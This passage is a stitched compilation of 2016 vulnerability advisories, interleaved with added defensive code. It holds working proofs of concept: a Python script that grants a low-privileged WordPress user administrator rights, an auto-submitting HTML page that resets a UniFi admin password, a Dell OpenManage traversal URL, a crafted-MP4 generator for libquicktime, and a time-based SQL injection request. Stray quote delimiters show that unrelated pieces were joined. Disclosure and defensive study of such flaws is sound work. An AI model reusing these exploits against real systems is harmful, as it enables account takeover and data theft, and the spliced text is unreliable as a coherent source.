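SUMMARY: AddressSanitizer: heap-buffer-overflow libxml2-2.9.3/HTMLparser.c:439:6 in htmlCurrentChar
"""

WIRESHARK_REPORT = """\
==5869==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001e95c at pc 0x0000004c1386 bp 0x7fff8c82cbf0 sp 0x7fff8c82c3a0
WRITE of size 1425 at 0x61b00001e95c thread T0
    #0 0x4c1385 in __asan_memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393
    #1 0x9c8ab0 in vwr_read_s2_s3_W_rec wireshark/wiretap/vwr.c:1614:5
0x61b00001e95c is located 0 bytes to the right of 1500-byte region [0x61b00001e380,0x61b00001e95c)
allocated by thread T0 here:
    #0 0x4d6ff8 in __interceptor_malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
SUMMARY: AddressSanitizer: heap-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393 in __asan_memcpy
"""


def parse_asan(report):
    """Return a dict of triage fields, or raise ValueError for other report shapes."""
    h, a, r = HEADER.search(report), ACCESS.search(report), REGION.search(report)
    if not (h and a and r):
        raise ValueError("not a heap-buffer-overflow report with an access stack")
    # The frames between the access line and the "is located" line are the access stack;
    # the allocation stack that follows is ignored here.
    frames = FRAME.findall(report[a.end():r.start()])
    if not frames:
        raise ValueError("no stack frames in the access stack")
    # First frame that is application code rather than the sanitizer's memcpy/malloc wrappers
    func, loc = next(((f, l) for f, l in frames if not f.startswith(RUNTIME_PREFIXES)), frames[0])
    lo, hi = int(r["lo"], 16), int(r["hi"], 16)
    size, dist = int(a["size"]), int(r["dist"])
    return {
        "kind": h["kind"],
        "op": a["op"],
        "size": size,
        "func": func,
        "loc": loc,
        "region_size": hi - lo,
        "offset": int(a["addr"], 16) - lo,   # faulting address relative to the allocation start
        # bytes of the access that fall outside the allocation
        "oob_bytes": dist + size if r["side"] == "right" else min(size, dist),
    }


def priority(rec):
    """Heuristic only: an out-of-bounds write is queued ahead of a read."""
    return "high" if rec["op"] == "WRITE" else "medium"


if __name__ == "__main__":
    for rep in (LIBXML_REPORT, WIRESHARK_REPORT):
        rec = parse_asan(rep)
        print(priority(rec), rec["op"], rec["size"], "bytes in", rec["func"], "at", rec["loc"],
              "->", rec["oob_bytes"], "bytes outside a", rec["region_size"], "byte region")
```

The "first application frame" rule matters for the Wireshark report: frame #0 is the sanitizer's memcpy interceptor, and the function worth opening is the caller in vwr.c. The priority is only a first sort key; a one-byte read in a parser that later uses the value can still be the more serious bug.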
"""
* Exploit Title: Extra User Details [Privilege Escalation]
* Discovery Date: 2016-02-13
* Exploit Author: Panagiotis Vagenas
* Author Link: https://twitter.com/panVagenas
* Vendor Homepage: http://vadimk.com/
* Software Link: https://wordpress.org/plugins/extra-user-details/
* Version: 0.4.2
* Tested on: WordPress 4.4.2
* Category: WebApps, WordPress
Description
-----------
_Extra User Details_ plugin for WordPress suffers from a Privilege Escalation
vulnerability.

The plugin hooks the `eud_update_ExtraFields` function to the `profile_update`
WordPress action. This function doesn't properly check user capabilities and
updates all meta information passed in the post data. The only condition is
that the post variable name has the `eud` prefix, which is stripped before
updating the values in the DB.

An attacker can exploit this misbehavior to update the `{prefix}_capabilities`
meta information to gain administrative privileges.

PoC
---

In the following PoC we assume that the database has the `wp` prefix, a very
common scenario as this is the default WordPress value.
"""
#!/usr/bin/python3
################################################################################
# Extra User Details Privilege Escalation Exploit
#
# Author: Panagiotis Vagenas <pan.vagenas>
#
# Dependencies: BeautifulSoup
# (http://www.crummy.com/software/BeautifulSoup/)
################################################################################
import requests
from bs4 import BeautifulSoup

baseUrl = 'http://example.com'
loginUrl = baseUrl + '/wp-login.php'
profileUrl = baseUrl + '/wp-admin/profile.php'

loginPostData = {
    'log': 'username',
    'pwd': 'password',
    'rememberme': 'forever',
    'wp-submit': 'Log+In'
}

# log in as a low-privileged user and keep the session cookies
s = requests.Session()
r = s.post(loginUrl, loginPostData)
if r.status_code != 200:
    print('Login error')
    exit(1)

# load the profile form so its nonce and existing field values can be replayed
r = s.get(profileUrl)
soup = BeautifulSoup(r.text, 'html.parser')
f = soup.find('form', {'id': 'your-profile'})
if not f:
    print('Error')
    exit(1)

data = {
    'eudwp_capabilities[administrator]': 1,
}
for i in f.find_all('input'):
    if 'name' in i.attrs and 'value' in i.attrs and i.attrs['value']:
        data[i.attrs['name']] = i.attrs['value']

r = s.post(profileUrl, data)
if r.status_code == 200:
    print('Success')
    exit(0)
"""
Solution
--------
Upgrade to v0.4.2.1
Timeline
--------
1. **2016-02-13**: Vendor notified through wordpress.org support forums
2. **2016-02-13**: Vendor notified through the contact form on his website
3. **2016-02-13**: Vendor responded and received details about this issue
4. **2016-02-15**: Vendor released v0.4.2.1 which resolves this issue
"""
RCE Security Advisory
https://www.rcesecurity.com
1. ADVISORY INFORMATION
-----------------------
Product: Ubiquiti Networks UniFi
Vendor URL: www.ubnt.com
Type: Cross-Site Request Forgery [CWE-353]
Date found: 2015-03-19
Date published: 2016-02-23
CVSSv3 Score: 6.3 (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L)
CVE: -
2. CREDITS
----------
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.
3. VERSIONS AFFECTED
--------------------
UniFi v3.2.10
older versions may be affected too.
4. INTRODUCTION
---------------
The UniFi® Controller software is a powerful, enterprise wireless software
engine ideal for high-density client deployments requiring low latency and
high uptime performance. A single UniFi Controller running in the cloud
can manage multiple sites: multiple, distributed deployments and
multi-tenancy for managed service providers.
(from the vendor's homepage)
5. VULNERABILITY DESCRIPTION
----------------------------
A generic Cross-Site Request Forgery protection bypass vulnerability was
identified in UniFi v3.2.10 and prior.
The application uses a CSRF protection, which is based on verifying the
Referer header, but does not catch the case where the Referer header
is completely missing.
This leads to a generic CSRF protection bypass, resulting in all
application-specific functionality becoming vulnerable. An attacker needs
to trick the victim into visiting an arbitrary website in order to exploit
the vulnerability. Successful exploits can allow the attacker to compromise
the whole application including connected devices, e.g. by changing
passwords of users, adding new users, changing device usernames and
passwords or by creating new WLAN configurations.
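The flaw described above is a fail-open default: the Referer is validated only when present, so a request that carries no Referer at all (which is exactly what a form submitted from an about:blank frame produces) is accepted. The two functions below are an added example, not UniFi's code: `weak_referer_check` reproduces the pattern the advisory describes so it can be contrasted with `strict_origin_check`, which prefers the Origin header, falls back to Referer, and rejects a request that carries neither. The application origin is taken from the PoC's action URL; the header dicts are constructed test input.

```python
"""Referer/Origin CSRF checks: the fail-open pattern beside a fail-closed one.

Added example, not UniFi's code. APP_ORIGIN comes from the PoC's action URL;
the request headers used in the demo are constructed.
"""
from urllib.parse import urlsplit

APP_ORIGIN = "https://127.0.0.1:8443"


def _origin_of(url):
    """scheme://host[:port] of a URL, or None if it has no scheme and host."""
    p = urlsplit(url)
    return f"{p.scheme}://{p.netloc}" if p.scheme and p.netloc else None


def weak_referer_check(headers, app_origin=APP_ORIGIN):
    """The pattern the advisory describes: only a *present* Referer is compared."""
    ref = headers.get("Referer")
    if ref is None:
        return True                      # missing header is never examined -> bypass
    return _origin_of(ref) == app_origin


def strict_origin_check(headers, app_origin=APP_ORIGIN):
    """Fail closed: use Origin if present, else Referer, and reject when neither
    is present or the first one present does not match the application origin."""
    h = {k.lower(): v for k, v in headers.items()}
    for name in ("origin", "referer"):
        value = h.get(name)
        # browsers send the literal string "null" for opaque origins; treat it as absent
        if value is not None and value != "null":
            return _origin_of(value) == app_origin
    return False


if __name__ == "__main__":
    cases = [
        {},                                                      # the PoC's request shape
        {"Referer": "https://evil.example/csrf.html"},
        {"Origin": "https://127.0.0.1:8443"},
        {"Referer": "https://127.0.0.1:8443/manage/"},
    ]
    for c in cases:
        print(c, "weak:", weak_referer_check(c), "strict:", strict_origin_check(c))
```

A header check of this kind is defence in depth rather than the primary control: Referer can be suppressed by policy or proxies, which is why the strict version rejects its absence instead of assuming the best, and why a per-session anti-CSRF token remains the control a state-changing endpoint should require.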
6. PROOF-OF-CONCEPT
-------------------
The following PoC changes the password of the user "admin" to "csrfpwd":
<html>
  <head>
    <script>
      function load() {
        var postdata = '<form id=csrf method=POST enctype=\'text\/plain\' action=\'https://127.0.0.1:8443/api/s/default/cmd/sitemgr\'>' +
                       '<input type=hidden name=\'json=%7B%22name%22%3A%22admin%22%2C%22x_password%22%3A%22csrfpwd%22%2C%22email%22%3A%22info%40mail.com%22%2C%22lang%22%3A%22en_US%22%2C%22cmd%22%3A%22set-self%22%7D\' value=\'\' />' +
                       '</form>';
        top.frames[0].document.body.innerHTML=postdata;
        top.frames[0].document.getElementById('csrf').submit();
      }
    </script>
  </head>
  <body onload="load()">
    <iframe src="about:blank" id="noreferer"></iframe>
  </body>
</html>
7. SOLUTION
-----------
Upgrade to UniFi v4.7.5 or later
8. REPORT TIMELINE
------------------
2015-03-19: Discovery of the vulnerability
2015-03-10: Reported via Ubiquiti's Bug Bounty program (hackerone.com)
2015-06-02: Vendor apologizes for his backlog
2015-09-28: Asking for status update via HackerOne
2015-09-28: Vendor asks to test against version 4.7.5
2015-10-02: Verified working fix for v4.7.5
2015-10-23: Vendor changes status to "Resolved"
2015-11-24: Asking for coordinated disclosure via email
2015-12-08: No response from vendor
2015-12-08: Requested public disclosure on HackerOne
2016-01-08: Report is published automatically
2016-02-23: Advisory released
9. REFERENCES
-------------
https://www.rcesecurity.com/2016/02/ubiquiti-bug-bounty-unifi-v3-2-10-generic-csrf-protection-bypass
https://hackerone.com/reports/52635
# Exploit Title: Dell OpenManage Server Administrator 8.2 Authenticated Directory Traversal
# Date: February 22, 2016
# Exploit Author: hantwister
# Vendor Homepage: http://www.dell.com/
# Software Link: http://www.dell.com/support/contents/us/en/19/article/Product-Support/Self-support-Knowledgebase/enterprise-resource-center/Enterprise-Tools/OMSA
# Version: 8.2
# Tested on: Windows 7 x64
When authenticated as an admin, make the following adjustments to the URL
below:
1) Substitute "<IP>" for the target;
2) Substitute "Windows\WindowsUpdate.log" for the desired file;
3) Substitute the value of the vid parameter and the folder name preceding
"/ViewFile" with the vid parameter from your current session.
https://<IP>:1311/0123456789ABCDEF/ViewFile?path=\temp&file=hello\..\..\..\..\..\..\..\..\Windows\WindowsUpdate.log&vid=0123456789ABCDEF
In the file parameter, "hello" can be changed to any other name; the folder
need not exist. However, the file parameter must not start with a common
file path separator, nor a dot character.
The path parameter should not be changed; the provided value is essential
to bypassing a security control.
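The control the advisory describes looks only at how the `file` parameter begins (no leading separator, no leading dot), which is why `..` segments placed after a harmless folder name get through. The function below is an added example, not Dell's code, of the check a server should make instead: join the parameters to the intended base directory, canonicalise the result, and require it to remain inside that directory. The base directory and parameter values are constructed.

```python
"""Keep user-supplied path/file parameters inside a base directory.

Added example, not Dell's code. The base directory and the parameter values
in the demo are constructed.
"""
import os


class TraversalError(ValueError):
    """Raised when the resolved path leaves the base directory."""


def safe_resolve(base_dir, path_param, file_param):
    """Return the canonical absolute path of base_dir/path_param/file_param,
    or raise TraversalError if canonicalisation takes it outside base_dir."""
    base = os.path.realpath(base_dir)
    # Treat backslashes as separators too (the advisory's target is Windows and the
    # request mixes both styles); drop the leading separator of `path` so it joins as a child.
    rel_dir = path_param.replace("\\", "/").lstrip("/")
    rel_file = file_param.replace("\\", "/")
    # An absolute `file` would make os.path.join discard the base; the containment
    # check below catches that case, so no prefix test on `file` is needed.
    candidate = os.path.realpath(os.path.join(base, rel_dir, rel_file))
    try:
        inside = os.path.commonpath([base, candidate]) == base
    except ValueError:        # different drives on Windows: certainly outside
        inside = False
    if not inside:
        raise TraversalError(f"{candidate!r} is outside {base!r}")
    return candidate


def is_safe(base_dir, path_param, file_param):
    """True when the parameters resolve to a location under base_dir."""
    try:
        safe_resolve(base_dir, path_param, file_param)
        return True
    except TraversalError:
        return False


if __name__ == "__main__":
    base = "/srv/viewfile-root"            # constructed base directory
    for path_p, file_p in (("\\temp", "report.txt"),
                           ("\\temp", "hello\\..\\notes.txt"),
                           ("\\temp", "hello\\..\\..\\..\\..\\..\\..\\Windows\\WindowsUpdate.log"),
                           ("\\temp", "/etc/passwd")):
        print(repr(file_p), "->", "allowed" if is_safe(base, path_p, file_p) else "rejected")
```

The decision is made on the canonical result rather than on the raw input, so it does not matter whether the escaping segment is the first one, whether the intermediate folder exists, or which separator style the client uses; the advisory's observation that `hello` need not exist is exactly why a prefix test on the parameter is the wrong place to look.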
#!/usr/bin/env python
#
###
# - 7 February 2016 -
# My last bug hunting session (*for fun and no-profit*)
# has been dedicated to libquicktime
###
#
# Author: Marco Romano - @nemux_ http://www.nemux.org
# libquicktime 1.2.4 Integer Overflow
#
# Product Page: http://libquicktime.sourceforge.net/
# Description: 'hdlr', 'stsd', 'ftab' MP4 Atoms Integer Overflow
# Affected products: All products using libquicktime version <= 1.2.4
#
# CVE-ID: CVE-2016-2399
#
# Disclosure part: http://www.nemux.org
#
########
####### Timeline
#
# 07 Feb 2016 Bug discovered
# 17 Feb 2016 Mitre.org contacted
# 17 Feb 2016 Disclosed to the project's maintainer
# 23 Feb 2016 No response from the maintainer
# 23 Feb 2016 Publicly disclosed
#
########
####### References
#
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2399
# http://libquicktime.sourceforge.net/
# http://www.linuxfromscratch.org/blfs/view/svn/multimedia/libquicktime.html
# https://en.wikipedia.org/wiki/QuickTime\_File\_Format
#
#######
#
# DISCLAIMER: It's just a PoC... it will crash something
#
####
import sys
import struct
import binascii

"""
There needs to be an mp4 file with these nested atoms to trigger the bug:
moov -> trak -> mdia -> hdlr
"""

# Hand-built MP4 as a hex string: ftyp, an empty mdat, then the moov tree
# whose hdlr atom carries the oversized component-name length byte.
hax0r_mp4 = ("0000001C667479704141414100000300336770346D70343133677036000000086D646174000001B1"
             "6D6F6F76"  #### moov atom
             "0000006C6D76686400000000CC1E6D6ECC1E6D6E000003E80000030200010000010000000000000000000000"
             "000100000000000000000000000000000001000000000000000000000000000040000000000000000000000000000000"
             "00000000000000000000000000000003000000FD756474610000001263707274000000000000FEFF0000000000126175"
             "7468000000000000FEFF0000000000127469746C000000000000FEFF00000000001264736370000000000000FEFF0000"
             "0000001270657266000000000000FEFF000000000012676E7265000000000000FEFF00000000001A72746E6700000000"
             "00000000000000000000FEFF000000000018636C7366000000000000000000000000FEFF00000000000F6B7977640000"
             "000055C400000000276C6F6369000000000000FEFF000000000000000000000000000000FEFF0000FEFF0000000000FF"
             "616C626D000000000000FEFF0000010000000E79727263000000000000000002E4"
             "7472616B"  #### trak atom
             "0000005C746B686400000001CC1E6D6ECC1E6D6E00000001000000000000030000000000000000000000000001000000"
             "000100000000000000000000000000000001000000000000000000000000000040000000000000000000000000000040"
             "6D646961"  #### mdia atom
             "000000206D64686400000000CC1E6D6ECC1E6D6E00003E800000300000000000000000"
             "4E"  #### hdlr atom length
             "68646C72"  #### hdlr atom
             "0000000000"
             "4141414141414141"  #### our airstrip :)
             "0000000000000000000000"
             "EC"  #### 236 > 127 <-- overflow here and a change in signedness too
             "616161000000FF736F756E000000000000000000000000536F756E6448616E646C6572000000012B6D696E6600000010")
hax0r_mp4 = bytearray(binascii.unhexlify(hax0r_mp4))


def createPoC():
    # Write the crafted bytes to nemux.mp4 in the current directory.
    try:
        with open("./nemux.mp4", "wb") as output:
            output.write(hax0r_mp4)
        print("[*] The PoC is done!")
    except Exception as e:
        print(str(e))
        print("[*] mmmm!")


def usage():
    print("\nUsage? Run it -> " + sys.argv[0])
    print("this poc creates an mp4 file named nemux.mp4")
    print("--------------------------------------------")
    print("This dummy help? " + sys.argv[0] + " help\n")
    sys.exit()


if __name__ == "__main__":
    try:
        if len(sys.argv) == 2:
            usage()
        else:
            print("\nlibquicktime <= 1.2.4 Integer Overflow CVE-2016-2399\n")
            print("Author: Marco Romano - @nemux_ - http://www.nemux.org\n\n")
            createPoC()
    except Exception as e:
        print(str(e))
        print("Ok... Something went wrong...")
        sys.exit()
Advisory ID: SYSS-2015-056
Product: Thru Managed File Transfer Portal
Manufacturer: Thru
Affected Version(s): 9.0.2
Tested Version(s): 9.0.2
Vulnerability Type: SQL Injection (CWE-89)
Risk Level: High
Solution Status: Open
Manufacturer Notification: 2015-10-28
Solution Date: 2016-01-22
Public Disclosure: 2016-02-15
CVE Reference: Not yet assigned
Authors of Advisory: Dr. Erlijn van Genuchten, Danny Österreicher (SySS GmbH)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Overview:
Thru Managed File Transfer Portal is a web based file transfer application.
According to the Thru website [1], the application aims to offload large
file transfer to a single platform, to protect files, to replace FTP
servers and to allow access to files anytime, anywhere.
An SQL injection vulnerability was identified in one of the GET requests.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerability Details:
The SQL injection vulnerability was found in a GET request that causes
contact data to be sorted. At least the attribute values of sortorder
and letterrange are not correctly sanitized and therefore can be abused
to inject arbitrary SQL statements.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Proof of Concept (PoC):
The following HTTP request can be used to show that the SQL statement
causing a delay is executed and results in a 500 server error:
GET /App/asp///contacts.asp?sortorder=1;WAITFOR+DELAY+'0:0:5'--&letterrange=all&fromrec=0&torec=20 HTTP/1.1
Host: [HOST]
Cookie: [COOKIES]
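An added defender's example, not Thru's code and not based on the portal's real schema or query: the two parameters named above handled so that neither reaches the SQL text. sortorder is mapped through an allowlist of ORDER BY clauses and letterrange is bound as a parameter, so a stacked payload such as the one in the request above is refused before any query is built. The contact table and its rows are constructed.

```python
import re
import sqlite3

# Constructed sample rows standing in for the portal's contact list; not Thru's schema.
SAMPLE_CONTACTS = [("Alice", "alice@example.test"), ("Bob", "bob@example.test"),
                   ("Carol", "carol@example.test"), ("Dave", "dave@example.test")]

# The only ORDER BY clauses that can ever be spliced into SQL text. The request
# value selects an entry here; it is never itself copied into the query.
SORT_ORDERS = {"1": "name ASC", "2": "name DESC", "3": "email ASC"}


class BadParameter(ValueError):
    """Raised for any request value outside the allowlist, before SQL is built."""


def build_contacts_query(sortorder, letterrange, fromrec, torec):
    """Return (sql, params) for the contact listing, or raise BadParameter."""
    if sortorder not in SORT_ORDERS:
        raise BadParameter("sortorder must be one of %s" % sorted(SORT_ORDERS))
    if letterrange == "all":
        where, params = "", []
    elif re.fullmatch(r"[A-Za-z]", letterrange):
        # The letter travels as a bound parameter, never as SQL text.
        where, params = " WHERE name LIKE ?", [letterrange + "%"]
    else:
        raise BadParameter("letterrange must be 'all' or a single letter")
    try:
        offset, limit = int(fromrec), int(torec) - int(fromrec)
    except ValueError:
        raise BadParameter("fromrec and torec must be integers")
    if offset < 0 or limit <= 0:
        raise BadParameter("fromrec/torec do not describe a valid window")
    sql = ("SELECT name, email FROM contacts%s ORDER BY %s LIMIT ? OFFSET ?"
           % (where, SORT_ORDERS[sortorder]))
    return sql, params + [limit, offset]


def list_contacts(sortorder, letterrange, fromrec="0", torec="20"):
    """Run the validated query against an in-memory SQLite copy of the sample data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE contacts (name TEXT, email TEXT)")
    conn.executemany("INSERT INTO contacts VALUES (?, ?)", SAMPLE_CONTACTS)
    sql, params = build_contacts_query(sortorder, letterrange, fromrec, torec)
    return [row[0] for row in conn.execute(sql, params)]
```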
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Solution:
The reported security vulnerability has been fixed in a new software
release. Update to the new software version.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclosure Timeline:
2015-10-27: Vulnerability discovered
2015-10-28: Vulnerability reported to manufacturer
2016-01-22: Manufacturer announced update
2016-02-15: Public release of security advisory
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
References:
[1] Thru Homepage
http://www.thruinc.com
[2] SySS Security Advisory SYSS-2015-056
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2015-056.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Credits:
This security vulnerability was found by Dr. Erlijn van Genuchten and
Danny Österreicher of the SySS GmbH.
E-Mail: erlijn.vangenuchten@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Erlijn_vanGenuchten.asc
Key ID: 0xBD96FF2A
Key Fingerprint: 17BB 4CED 755A CBB3 2D47 C563 0CA5 8637 BD96 FF2A
E-Mail: danny.oesterreicher@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Danny_Oesterreicher.asc
Key ID: 0x96029AC7
Key Fingerprint: 0B53 8B52 9B5F 39C9 68F5 18C9 9284 FCEB 9602 9AC7
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclaimer:
The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Copyright:
Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
Source: https://code.google.com/p/google-security-research/issues/detail?id=648
The following crash due to a static out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==7855==ERROR: AddressSanitizer: global-buffer-overflow on address 0x000005676c18 at pc 0x000001ab09d2 bp 0x7ffc9ce376b0 sp 0x7ffc9ce376a8
READ of size 8 at 0x000005676c18 thread T0
#0 0x1ab09d1 in dissect_ber_set wireshark/epan/dissectors/packet-ber.c:2588:64
#1 0x198e7c7 in dissect_ansi_tcap_T_paramSet wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:189:12
#2 0x1ab47f4 in dissect_ber_choice wireshark/epan/dissectors/packet-ber.c:2898:21
#3 0x198e652 in dissect_ansi_tcap_T_parameter_03 wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:210:12
#4 0x1aae8bc in dissect_ber_sequence wireshark/epan/dissectors/packet-ber.c:2400:17
#5 0x198b2f7 in dissect_ansi_tcap_Reject wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:227:12
#6 0x1ab47f4 in dissect_ber_choice wireshark/epan/dissectors/packet-ber.c:2898:21
#7 0x198aee2 in dissect_ansi_tcap_ComponentPDU wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:256:12
#8 0x1abba52 in dissect_ber_sq_of wireshark/epan/dissectors/packet-ber.c:3490:9
#9 0x1abbe2f in dissect_ber_sequence_of wireshark/epan/dissectors/packet-ber.c:3521:12
#10 0x198ae17 in dissect_ansi_tcap_SEQUENCE_OF_ComponentPDU wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:270:12
#11 0x1a966a7 in dissect_ber_tagged_type wireshark/epan/dissectors/packet-ber.c:691:9
#12 0x19898ac in dissect_ansi_tcap_ComponentSequence wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:280:12
#13 0x1aae8bc in dissect_ber_sequence wireshark/epan/dissectors/packet-ber.c:2400:17
#14 0x198e887 in dissect_ansi_tcap_TransactionPDU wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:145:12
#15 0x1988ded in dissect_ansi_tcap_T_queryWithPerm wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:134:12
#16 0x1ab47f4 in dissect_ber_choice wireshark/epan/dissectors/packet-ber.c:2898:21
#17 0x1988b30 in dissect_ansi_tcap_PackageType wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:173:12
#18 0x1988830 in dissect_ansi_tcap wireshark/epan/dissectors/../../asn1/ansi_tcap/packet-ansi_tcap-template.c:385:5
#19 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#20 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#21 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#22 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#23 0xaefba8 in call_dissector wireshark/epan/packet.c:2692:9
#24 0x16c3f24 in dissect_tcap wireshark/epan/dissectors/../../asn1/tcap/packet-tcap-template.c:2004:14
#25 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#26 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#27 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#28 0x11d6632 in dissect_sccp_data_param wireshark/epan/dissectors/packet-sccp.c:2346:31
#29 0x11d47a1 in dissect_sccp_parameter wireshark/epan/dissectors/packet-sccp.c:2559:5
#30 0x11d5169 in dissect_sccp_variable_parameter wireshark/epan/dissectors/packet-sccp.c:2640:3
#31 0x11cec1e in dissect_sccp_message wireshark/epan/dissectors/packet-sccp.c:2951:5
#32 0x11cc3f9 in dissect_sccp wireshark/epan/dissectors/packet-sccp.c:3402:3
#33 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#34 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#35 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#36 0xae5a38 in dissector_try_uint wireshark/epan/packet.c:1174:9
#37 0xefae51 in dissect_mtp3_payload wireshark/epan/dissectors/packet-mtp3.c:647:8
#38 0xef8466 in dissect_mtp3 wireshark/epan/dissectors/packet-mtp3.c:767:3
#39 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#40 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#41 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#42 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#43 0xaefba8 in call_dissector wireshark/epan/packet.c:2692:9
#44 0x2da26b4 in dissect_protocol_data_1_parameter wireshark/epan/dissectors/packet-m2ua.c:507:3
#45 0x2da11b2 in dissect_parameter wireshark/epan/dissectors/packet-m2ua.c:952:5
#46 0x2da006b in dissect_parameters wireshark/epan/dissectors/packet-m2ua.c:1026:5
#47 0x2d9fb58 in dissect_message wireshark/epan/dissectors/packet-m2ua.c:1041:3
#48 0x2d9fa96 in dissect_m2ua wireshark/epan/dissectors/packet-m2ua.c:1058:3
#49 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#50 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#51 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#52 0x39012a2 in dissect_payload wireshark/epan/dissectors/packet-sctp.c:2517:9
#53 0x38f7d37 in dissect_data_chunk wireshark/epan/dissectors/packet-sctp.c:3443:16
#54 0x38f0ac8 in dissect_sctp_chunk wireshark/epan/dissectors/packet-sctp.c:4360:14
#55 0x38ed8e6 in dissect_sctp_chunks wireshark/epan/dissectors/packet-sctp.c:4515:9
#56 0x38eb79f in dissect_sctp_packet wireshark/epan/dissectors/packet-sctp.c:4678:3
#57 0x38e95d5 in dissect_sctp wireshark/epan/dissectors/packet-sctp.c:4732:3
#58 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#59 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#60 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#61 0x29c5318 in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:2001:7
#62 0x29d0521 in dissect_ip_v4 wireshark/epan/dissectors/packet-ip.c:2485:10
#63 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#64 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#65 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#66 0xae5a38 in dissector_try_uint wireshark/epan/packet.c:1174:9
#67 0x24e0824 in dissect_ethertype wireshark/epan/dissectors/packet-ethertype.c:307:21
#68 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#69 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#70 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#71 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#72 0x24dc752 in dissect_eth_common wireshark/epan/dissectors/packet-eth.c:545:5
#73 0x24d499a in dissect_eth_maybefcs wireshark/epan/dissectors/packet-eth.c:828:5
#74 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#75 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#76 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#77 0x25dca12 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#78 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#79 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#80 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#81 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#82 0xadffde in dissect_record wireshark/epan/packet.c:501:3
